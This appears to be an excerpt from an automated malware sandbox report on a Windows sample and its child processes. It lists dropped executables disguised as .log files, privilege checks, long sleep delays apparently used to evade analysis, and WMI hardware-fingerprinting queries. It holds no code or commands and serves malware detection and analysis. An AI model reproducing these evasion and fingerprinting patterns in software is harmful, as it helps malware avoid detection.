                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\tKFUOyWv.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\unicodedata.pydJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\JSejfBbH.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\QYTGHhqw.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\SUVZKjmy.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\djIfBqMY.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\python310.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\bmTftlYf.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\MZFQQyWG.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\ifKwJWCS.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\GLhaJjhM.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\select.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\cACFdGgc.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_decimal.pydJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\pUOdHCWB.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\EqAsTbqX.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\XWHGkwkl.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_ctypes.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\vIRlNZYv.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\xiBLBWku.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\xnytOABw.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\KWThvPSL.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\xGttiZnp.logJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\LXhZiUrJ.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\BLFrfvoX.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_ssl.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\AwjkpWnj.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_socket.pydJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\FuissdNI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\IsmZtopJ.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_socket.pydJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\eGaXQvvb.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\hwDWkmWW.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\ViDyzjon.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_lzma.pydJump to dropped file
                                  Source: C:\Recovery\HpQPPZazcv.exeDropped PE file which has not been started: C:\Users\user\Desktop\VuNhAaSo.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\select.pydJump to dropped file
                                  Source: C:\ProgramData\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\wYntCyZj.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-16994
                                  Source: C:\ProgramData\Microsoft\based.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-38527
                                  Source: C:\ProgramData\Microsoft\based.exe TID: 3236Thread sleep count: 53 > 30Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exe TID: 3236Thread sleep time: -53000s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep count: 2694 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep count: 3130 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276Thread sleep count: 2399 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep count: 2348 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe TID: 7808Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep count: 821 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6944Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\cmd.exe TID: 7932Thread sleep time: -30000s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep count: 6424 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -9223372036854770s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep count: 491 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 7864Thread sleep time: -30000s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -32281802128991695s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -600000s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -599745s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 704Thread sleep time: -18000000s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -583656s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -580984s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -579906s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -579422s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -577140s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -576531s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -574172s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -573562s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -572890s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -572375s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -572000s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -571703s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -571375s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -571140s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -570906s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -570751s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -570627s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -568775s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -568562s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -568446s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -568203s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -568020s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -567828s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -567651s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -567527s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -567390s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -565203s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -565053s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -564656s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -564493s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -564381s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -564115s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -563984s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -563875s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -563764s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -563656s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -563542s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -562034s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -561919s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -561812s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -561702s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -561586s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -561467s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -561351s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -560689s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -560578s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -560439s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -560319s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -560199s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -560053s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -558589s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -558481s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -558375s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -558265s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -558155s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -558043s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -557929s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -557811s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -557702s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -557585s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -557479s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -557358s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -557250s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -557139s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -557031s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -556922s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 6956Thread sleep time: -556812s >= -30000s
                                  Source: C:\Recovery\HpQPPZazcv.exe TID: 7608Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Recovery\HpQPPZazcv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Recovery\HpQPPZazcv.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Recovery\HpQPPZazcv.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00D9C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D9C4A8
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DAE560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00DAE560
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D017F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,1_2_00007FF67D017F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D017F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,1_2_00007FF67D017F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D021FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF67D021FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D008B00 FindFirstFileExW,FindClose,1_2_00007FF67D008B00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B32DCE0 FindFirstFileExW,2_2_000001F91B32DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272685A0 FindFirstFileExW,FindClose,2_2_00007FF7272685A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272679B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7272679B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727280B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF727280B84
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A4DCE0 FindFirstFileExW,4_2_00000201D1A4DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272685A0 FindFirstFileExW,FindClose,4_2_00007FF7272685A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727280B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF727280B84
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272679B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF7272679B0
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DB0B80 VirtualQuery,GetSystemInfo,0_2_00DB0B80
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 30000
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 600000
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 599745
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 3600000
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 583656
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 580984
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 579906
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 579422
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 577140
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 576531
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 574172
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 573562
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 572890
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 572375
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 572000
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 571703
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 571375
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 571140
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 570906
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 570751
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 570627
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 568775
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 568562
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 568446
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 568203
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 568020
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 567828
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 567651
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 567527
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 567390
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 565203
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 565053
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 564656
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 564493
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 564381
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 564115
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 563984
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 563875
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 563764
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 563656
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 563542
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 562034
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561919
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561812
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561702
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561586
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561467
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 561351
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560689
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560578
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560439
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560319
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560199
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 560053
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558589
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558481
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558375
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558265
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558155
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 558043
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557929
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557811
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557702
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557585
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557479
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557358
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557250
